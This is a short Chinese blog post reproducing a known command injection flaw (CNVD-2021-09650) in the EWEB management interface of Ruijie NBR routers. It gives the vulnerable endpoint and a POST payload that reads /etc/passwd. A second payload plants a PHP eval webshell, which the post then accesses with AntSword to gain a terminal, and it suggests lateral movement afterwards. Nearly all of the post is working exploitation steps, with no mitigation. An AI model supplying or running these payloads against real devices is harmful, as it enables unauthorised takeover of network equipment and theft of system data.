网管系统锐捷:锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞 + GetShell 2024-05-03 04:11:26 0 0 锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞 + GetShell 漏洞编号: CNVD-2021-09650 漏洞描述:锐捷NBR路由器 EWEB网关系统部分接口存在命令注入,导致远程命令执行获取 漏洞影响: 锐捷NBR路由器 EWEB网关系统 漏洞复现: 首先打开网关系统 然后在URL后面加 /guest_auth/guestIsUp.php,此路径为漏洞存在地。 我们打开hacker Bar,在Post data 输入 mac=1&ip=127.0.0.1|cat /etc/passwd > test.txt 这句代码的意思是使用cat 查看/etc/passwd路径下的passwd 文件,并将内容保存到test.txt 接着我们访问url/test.txt 路径,查看文件。 回显了/etc/passwd路径下passwd文件的内容 利用漏洞文件文件上传。 利用此漏洞我们可以将一句话木马写入sorry.php文件,然后用蚁剑来连接webshell. 漏洞复现: Payload : mac=1&ip=127.0.0.1|echo ‘<?php @eval($_POST[‘bb’]) ?>’ > sorry.php 将这句话execute一下。 然后我们直接上蚁剑连接就ok了 这边直接能看到我们上传的webshell 右击终端 然后就可以进一步的横向或者纵向,也可以进一步信息收集。 博客来之不易,还望各位大佬点赞关注,谢谢! 想找安全岗位私信内推哦! 收藏(0)